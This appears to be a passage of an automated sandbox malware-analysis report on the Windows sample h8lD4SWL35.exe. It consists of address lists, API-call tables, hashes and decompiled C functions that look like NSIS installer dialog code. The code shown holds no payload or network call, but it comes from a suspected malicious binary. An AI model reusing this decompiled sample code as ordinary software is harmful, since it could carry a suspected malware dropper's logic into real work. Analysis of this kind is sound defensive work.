                                                                                0x0040365d
                                                                                0x0040365d
                                                                                0x00403673
                                                                                0x00403679
                                                                                0x00403687
                                                                                0x00403716
                                                                                0x0040371e
                                                                                0x00403728
                                                                                0x0040372d
                                                                                0x00403733
                                                                                0x004037bd
                                                                                0x004037c2
                                                                                0x004037c4
                                                                                0x004037e0
                                                                                0x00000000
                                                                                0x004037e0
                                                                                0x004037c6
                                                                                0x004037cc
                                                                                0x004037d4
                                                                                0x004037d4
                                                                                0x00000000
                                                                                0x004037cc
                                                                                0x00403741
                                                                                0x00403752
                                                                                0x00403754
                                                                                0x00403756
                                                                                0x0040375d
                                                                                0x0040375d
                                                                                0x00403765
                                                                                0x0040376d
                                                                                0x0040376f
                                                                                0x00403771
                                                                                0x0040377a
                                                                                0x0040377d
                                                                                0x00403783
                                                                                0x00403783
                                                                                0x004037a2
                                                                                0x004037b3
                                                                                0x00000000
                                                                                0x004037b8
                                                                                0x00403720
                                                                                0x00403722
                                                                                0x00000000
                                                                                0x0040368d
                                                                                0x0040368d
                                                                                0x00403693
                                                                                0x0040369d
                                                                                0x004036a5
                                                                                0x004036af
                                                                                0x004036b5
                                                                                0x004036c3
                                                                                0x004037e5
                                                                                0x004037e5
                                                                                0x00000000
                                                                                0x004037e5
                                                                                0x004036c9
                                                                                0x004036d2
                                                                                0x00403711
                                                                                0x00000000
                                                                                0x00403711
                                                                                0x004035cb
                                                                                0x004035cb
                                                                                0x004035d0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004035da
                                                                                0x004035ea
                                                                                0x004035ef
                                                                                0x004035f6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004035fa
                                                                                0x004035fc
                                                                                0x00403609
                                                                                0x00403609
                                                                                0x00403611
                                                                                0x00403617
                                                                                0x0040363f
                                                                                0x00403647
                                                                                0x00000000
                                                                                0x00403629
                                                                                0x0040362a
                                                                                0x00403633
                                                                                0x00403639
                                                                                0x0040363a
                                                                                0x00000000
                                                                                0x0040363a
                                                                                0x00403635
                                                                                0x00403637
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403637
                                                                                0x00403617

                                                                                APIs
                                                                                  • Part of subcall function 00405CFB: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D0D
                                                                                  • Part of subcall function 00405CFB: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D18
                                                                                  • Part of subcall function 00405CFB: GetProcAddress.KERNEL32(00000000,?), ref: 00405D29
                                                                                • lstrcatA.KERNEL32(1033,00420478,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420478,00000000,00000006,"C:\Users\user\Desktop\h8lD4SWL35.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403597
                                                                                • lstrlenA.KERNEL32(Bgcedtxsf,?,?,?,Bgcedtxsf,00000000,00429400,1033,00420478,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420478,00000000,00000006,"C:\Users\user\Desktop\h8lD4SWL35.exe" ), ref: 0040360C
                                                                                • lstrcmpiA.KERNEL32(?,.exe,Bgcedtxsf,?,?,?,Bgcedtxsf,00000000,00429400,1033,00420478,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420478,00000000), ref: 0040361F
                                                                                • GetFileAttributesA.KERNEL32(Bgcedtxsf), ref: 0040362A
                                                                                • LoadImageA.USER32 ref: 00403673
                                                                                  • Part of subcall function 0040593B: wsprintfA.USER32 ref: 00405948
                                                                                • RegisterClassA.USER32 ref: 004036BA
                                                                                • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036D2
                                                                                • CreateWindowExA.USER32 ref: 0040370B
                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403741
                                                                                • LoadLibraryA.KERNEL32(RichEd20), ref: 00403752
                                                                                • LoadLibraryA.KERNEL32(RichEd32), ref: 0040375D
                                                                                • GetClassInfoA.USER32 ref: 0040376D
                                                                                • GetClassInfoA.USER32 ref: 0040377A
                                                                                • RegisterClassA.USER32 ref: 00403783
                                                                                • DialogBoxParamA.USER32 ref: 004037A2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                • String ID: 6B$"C:\Users\user\Desktop\h8lD4SWL35.exe" $.DEFAULT\Control Panel\International$.exe$1033$Bgcedtxsf$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                • API String ID: 914957316-1292814654
                                                                                • Opcode ID: 5b3a5c605f4327ce9e4b48b8f1485f13e4fe92e166de592439822e0313b46685
                                                                                • Instruction ID: e641be27134a8dcb3df5e8149496619264a0b668a6353d45bac4cee409cb923c
                                                                                • Opcode Fuzzy Hash: 5b3a5c605f4327ce9e4b48b8f1485f13e4fe92e166de592439822e0313b46685
                                                                                • Instruction Fuzzy Hash: 5361C5B1A04200BAD6206F659C45E3B3A6DE74474AF40453FF941B62E1D77D9D028A3E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004038BC, Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 83%
                                                                                			E004038BC(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42045c = _t35;
					if(_t115 == 0x110) {
						 *0x423e88 = _t125;
						 *0x420470 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f438 = _t91;
						E00403D8F(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423668);
						 *0x42364c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42045c = 1;
					}
					_t122 =  *0x4091a4; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ea0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403DDB(0x40b);
						while(1) {
							_t37 =  *0x42045c;
							 *0x4091a4 =  *0x4091a4 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091a4; // 0xffffffff
							__eflags = _t39 -  *0x423ea4;
							if(_t39 ==  *0x423ea4) {
								E0040140B(1);
							}
							__eflags =  *0x42364c - _t133;
							if( *0x42364c != _t133) {
								break;
							}
							__eflags =  *0x4091a4 -  *0x423ea4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E004059FF(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403D8F(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403D8F(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403D8F(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f0c - _t133;
							_v32 = _t49;
							if( *0x423f0c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403DB1(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f438, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f0c - _t133;
							if( *0x423f0c == _t133) {
								_push( *0x420470);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f438);
							}
							E00403DC4();
							E004059DD(0x420478, 0x423680);
							E004059FF(0x420478, _t125, _t130,  &(0x420478[lstrlenA(0x420478)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420478);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423658);
									 *0x41fc48 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423e80,  *_t130 +  *0x423660 & 0x0000ffff, _t125,  *(0x4091a8 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423658 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403D8F(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423658, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42364c - _t133;
									if( *0x42364c != _t133) {
										goto L61;
									}
									ShowWindow( *0x423658, 8);
									E00403DDB(0x405);
									goto L58;
								}
								__eflags =  *0x423f0c - _t133;
								if( *0x423f0c != _t133) {
									goto L61;
								}
								__eflags =  *0x423f00 - _t133;
								if( *0x423f00 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423658);
						 *0x423e88 = _t133;
						EndDialog(_t125,  *0x41f840);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423658, 0x40f, 0, 1);
						__eflags =  *0x42364c;
						return 0 |  *0x42364c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420450, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420450,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403DF6(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423658, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f0c - _t133;
										if( *0x423f0c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f840 = 1;
											L21:
											_push(0x78);
											L22:
											E00403D68();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f840 = _t127;
										goto L21;
									}
									__eflags =  *0x4091a4 - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423658);
						 *0x423658 = _a12;
						L58:
						if( *0x421478 == _t133 &&  *0x423658 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x421478 = 1;
						}
						L61:
						return 0;
					}
				}
			}






























                                                                                0x004038c5
                                                                                0x004038ce
                                                                                0x00403a0f
                                                                                0x00403a13
                                                                                0x00403a17
                                                                                0x00403a19
                                                                                0x00403a1e
                                                                                0x00403a29
                                                                                0x00403a34
                                                                                0x00403a39
                                                                                0x00403a3b
                                                                                0x00403a3d
                                                                                0x00403a40
                                                                                0x00403a45
                                                                                0x00403a53
                                                                                0x00403a60
                                                                                0x00403a67
                                                                                0x00403a67
                                                                                0x00403a68
                                                                                0x00403a68
                                                                                0x00403a6d
                                                                                0x00403a73
                                                                                0x00403a7a
                                                                                0x00403a80
                                                                                0x00403a82
                                                                                0x00403ac2
                                                                                0x00403ac7
                                                                                0x00403acc
                                                                                0x00403acc
                                                                                0x00403ad1
                                                                                0x00403ada
                                                                                0x00403adc
                                                                                0x00403ae1
                                                                                0x00403ae7
                                                                                0x00403aeb
                                                                                0x00403aeb
                                                                                0x00403af0
                                                                                0x00403af6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403b01
                                                                                0x00403b07
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403b10
                                                                                0x00403b18
                                                                                0x00403b1d
                                                                                0x00403b20
                                                                                0x00403b26
                                                                                0x00403b2b
                                                                                0x00403b2e
                                                                                0x00403b34
                                                                                0x00403b39
                                                                                0x00403b3c
                                                                                0x00403b42
                                                                                0x00403b4a
                                                                                0x00403b50
                                                                                0x00403b56
                                                                                0x00403b5a
                                                                                0x00403b61
                                                                                0x00403b61
                                                                                0x00403b61
                                                                                0x00403b6b
                                                                                0x00403b7d
                                                                                0x00403b89
                                                                                0x00403b8e
                                                                                0x00403b98
                                                                                0x00403b9e
                                                                                0x00403ba0
                                                                                0x00403ba5
                                                                                0x00403ba2
                                                                                0x00403ba2
                                                                                0x00403ba2
                                                                                0x00403bb5
                                                                                0x00403bcd
                                                                                0x00403bcf
                                                                                0x00403bd5
                                                                                0x00403bea
                                                                                0x00403bd7
                                                                                0x00403be0
                                                                                0x00403be2
                                                                                0x00403be2
                                                                                0x00403bf0
                                                                                0x00403c00
                                                                                0x00403c11
                                                                                0x00403c18
                                                                                0x00403c1e
                                                                                0x00403c22
                                                                                0x00403c27
                                                                                0x00403c29
                                                                                0x00000000
                                                                                0x00403c2f
                                                                                0x00403c2f
                                                                                0x00403c31
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403c37
                                                                                0x00403c3b
                                                                                0x00403c60
                                                                                0x00403c66
                                                                                0x00403c6c
                                                                                0x00403c6e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403c94
                                                                                0x00403c9a
                                                                                0x00403c9c
                                                                                0x00403ca1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403ca7
                                                                                0x00403caa
                                                                                0x00403cad
                                                                                0x00403cc4
                                                                                0x00403cd0
                                                                                0x00403ce9
                                                                                0x00403cef
                                                                                0x00403cf3
                                                                                0x00403cf8
                                                                                0x00403cfe
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403d08
                                                                                0x00403d13
                                                                                0x00000000
                                                                                0x00403d13
                                                                                0x00403c3d
                                                                                0x00403c43
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403c49
                                                                                0x00403c4f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403c55
                                                                                0x00403c29
                                                                                0x00403d20
                                                                                0x00403d2c
                                                                                0x00403d33
                                                                                0x00000000
                                                                                0x00403a84
                                                                                0x00403a84
                                                                                0x00403a87
                                                                                0x00403aba
                                                                                0x00403aba
                                                                                0x00403abc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403abc
                                                                                0x00403a89
                                                                                0x00403a8d
                                                                                0x00403a92
                                                                                0x00403a94
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403aa4
                                                                                0x00403aac
                                                                                0x00000000
                                                                                0x00403ab2
                                                                                0x004038e0
                                                                                0x004038e0
                                                                                0x004038e4
                                                                                0x004038e9
                                                                                0x004038f8
                                                                                0x004038f8
                                                                                0x00403901
                                                                                0x0040390a
                                                                                0x00403915
                                                                                0x00403915
                                                                                0x00403921
                                                                                0x0040393d
                                                                                0x00403940
                                                                                0x00403953
                                                                                0x00403959
                                                                                0x004039fc
                                                                                0x00000000
                                                                                0x00403a05
                                                                                0x0040395f
                                                                                0x0040396c
                                                                                0x0040396e
                                                                                0x00403970
                                                                                0x0040398f
                                                                                0x0040398f
                                                                                0x00403992
                                                                                0x00403997
                                                                                0x0040399a
                                                                                0x004039aa
                                                                                0x004039ab
                                                                                0x004039ad
                                                                                0x004039e3
                                                                                0x004039f6
                                                                                0x00000000
                                                                                0x004039f6
                                                                                0x004039af
                                                                                0x004039b5
                                                                                0x004039ce
                                                                                0x004039d3
                                                                                0x004039d5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004039d7
                                                                                0x004039c3
                                                                                0x004039c3
                                                                                0x004039c5
                                                                                0x004039c5
                                                                                0x00000000
                                                                                0x004039c5
                                                                                0x004039b8
                                                                                0x004039bd
                                                                                0x00000000
                                                                                0x004039bd
                                                                                0x0040399c
                                                                                0x004039a2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004039a4
                                                                                0x00000000
                                                                                0x004039a4
                                                                                0x00403994
                                                                                0x00000000
                                                                                0x00403994
                                                                                0x0040397a
                                                                                0x00403981
                                                                                0x00403987
                                                                                0x00403989
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403989
                                                                                0x00403945
                                                                                0x00000000
                                                                                0x00403923
                                                                                0x00403929
                                                                                0x00403933
                                                                                0x00403d39
                                                                                0x00403d3f
                                                                                0x00403d4c
                                                                                0x00403d52
                                                                                0x00403d52
                                                                                0x00403d5c
                                                                                0x00000000
                                                                                0x00403d5c
                                                                                0x00403921

                                                                                APIs
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004038F8
                                                                                • ShowWindow.USER32(?), ref: 00403915
                                                                                • DestroyWindow.USER32 ref: 00403929
                                                                                • SetWindowLongA.USER32 ref: 00403945
                                                                                • GetDlgItem.USER32 ref: 00403966
                                                                                • SendMessageA.USER32 ref: 0040397A
                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403981
                                                                                • GetDlgItem.USER32 ref: 00403A2F
                                                                                • GetDlgItem.USER32 ref: 00403A39
                                                                                • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403A53
                                                                                • SendMessageA.USER32 ref: 00403AA4
                                                                                • GetDlgItem.USER32 ref: 00403B4A
                                                                                • ShowWindow.USER32(00000000,?), ref: 00403B6B
                                                                                • EnableWindow.USER32(?,?), ref: 00403B7D
                                                                                • EnableWindow.USER32(?,?), ref: 00403B98
                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403BAE
                                                                                • EnableMenuItem.USER32 ref: 00403BB5
                                                                                • SendMessageA.USER32 ref: 00403BCD
                                                                                • SendMessageA.USER32 ref: 00403BE0
                                                                                • lstrlenA.KERNEL32(00420478,?,00420478,00423680), ref: 00403C09
                                                                                • SetWindowTextA.USER32(?,00420478), ref: 00403C18
                                                                                • ShowWindow.USER32(?,0000000A), ref: 00403D4C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                • String ID:
                                                                                • API String ID: 184305955-0
                                                                                • Opcode ID: d8b962e911b7c253e61e73d21e88cb3add85ad3b5a8fe6332aee3bd0e594c397
                                                                                • Instruction ID: 874aaf0cc80a4ada72e8b6aceb9d73cb056a569e4b675a7f159d56e4bf17f1bf
                                                                                • Opcode Fuzzy Hash: d8b962e911b7c253e61e73d21e88cb3add85ad3b5a8fe6332aee3bd0e594c397
                                                                                • Instruction Fuzzy Hash: F9C18E71A04204BBDB206F21ED85E2B3E7CEB05746F40453EF641B52F1C779AA429B2E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403ED7, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 93%
                                                                                			E00403ED7(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420458 =  *0x420458 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403DF6(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422e20;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e20
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423e88, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423e88, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420458 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fc48 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403DB1(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404162();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42365c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x423eb8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403EA3;
				E00403D8F(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403D8F(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403DB1( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403DC4(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x423e90 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f43c =  *0x41f43c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420458 =  *0x420458 & 0x00000000;
				return 0;
			}

















                                                                                0x00403ee7
                                                                                0x0040400d
                                                                                0x00404069
                                                                                0x0040406d
                                                                                0x00404144
                                                                                0x00404146
                                                                                0x00404146
                                                                                0x0040414c
                                                                                0x0040414c
                                                                                0x0040414f
                                                                                0x00000000
                                                                                0x00404156
                                                                                0x0040407b
                                                                                0x0040407d
                                                                                0x00404087
                                                                                0x00404092
                                                                                0x00404095
                                                                                0x00404098
                                                                                0x004040a3
                                                                                0x004040a6
                                                                                0x004040ad
                                                                                0x004040bb
                                                                                0x004040d3
                                                                                0x004040db
                                                                                0x004040e6
                                                                                0x004040f6
                                                                                0x004040f8
                                                                                0x004040f8
                                                                                0x004040ad
                                                                                0x00404102
                                                                                0x00000000
                                                                                0x0040410d
                                                                                0x00404111
                                                                                0x00404122
                                                                                0x00404122
                                                                                0x00404128
                                                                                0x00404136
                                                                                0x00404136
                                                                                0x00000000
                                                                                0x0040413a
                                                                                0x00404102
                                                                                0x00404018
                                                                                0x00000000
                                                                                0x0040402c
                                                                                0x00404032
                                                                                0x00404038
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040405d
                                                                                0x0040405f
                                                                                0x00404064
                                                                                0x00000000
                                                                                0x00404064
                                                                                0x00404018
                                                                                0x00403eed
                                                                                0x00403ef0
                                                                                0x00403ef5
                                                                                0x00403f06
                                                                                0x00403f06
                                                                                0x00403f0d
                                                                                0x00403f10
                                                                                0x00403f12
                                                                                0x00403f17
                                                                                0x00403f20
                                                                                0x00403f26
                                                                                0x00403f32
                                                                                0x00403f35
                                                                                0x00403f3e
                                                                                0x00403f43
                                                                                0x00403f46
                                                                                0x00403f4b
                                                                                0x00403f62
                                                                                0x00403f69
                                                                                0x00403f7c
                                                                                0x00403f7f
                                                                                0x00403f94
                                                                                0x00403f9b
                                                                                0x00403fa0
                                                                                0x00403fa5
                                                                                0x00403fa5
                                                                                0x00403fb4
                                                                                0x00403fc3
                                                                                0x00403fc5
                                                                                0x00403fdb
                                                                                0x00403fea
                                                                                0x00403fec
                                                                                0x00000000

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                • String ID: .B$N$open
                                                                                • API String ID: 3615053054-847860968
                                                                                • Opcode ID: da112c14776137c7bd89e7c73a234b8b17dddee6ca60b81d448b510bce2e22e9
                                                                                • Instruction ID: 4310844e4bc5412d85e0e67e924f78a0a7df87fdbfd2fc52009ff806257c2229
                                                                                • Opcode Fuzzy Hash: da112c14776137c7bd89e7c73a234b8b17dddee6ca60b81d448b510bce2e22e9
